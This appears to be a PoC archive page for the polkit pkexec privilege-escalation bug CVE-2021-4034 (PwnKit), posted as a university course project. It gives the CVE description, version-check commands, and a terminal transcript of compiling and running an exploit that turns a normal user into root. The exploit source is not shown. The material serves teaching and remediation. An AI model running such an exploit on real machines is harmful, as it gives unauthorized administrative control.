Associated Vulnerability
Title:polkit 缓冲区错误漏洞 (CVE-2021-4034)Description:A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
Description
Software Vulnerabilities and mitigation university course, to show exploitation and remediation caused by this vulnerability
Readme
# PwnKit-Local-Privilege-Escalation-Vulnerability-Discovered-in-polkit-s-pkexec-CVE-2021-4034-
Software Vulnerabilities and mitigation university project, to show exploitation and remediation caused by this vulnerability.
We used for this experiment Ubunto version 16.04 LTS, as well and Debian 10.1.0 which will be shown in the experiment.
setting up the environment was essentail since you need always to verify the version you work on to be sure it's vulenrable or not.
checking commands used : dpkg -l | grep polkit, pkexec --version
# CVE-2021-4034
PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)
https://seclists.org/oss-sec/2022/q1/80
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
# PoC
Verified on Debian 10 and Ubunto 16.0.4
```
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
File Snapshot
[4.0K] /data/pocs/cf8cd9d6df4f030652d6f3ff31bf98802465158d
├── [2.6K] exploit.c
└── [1.3K] README.md
0 directories, 2 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →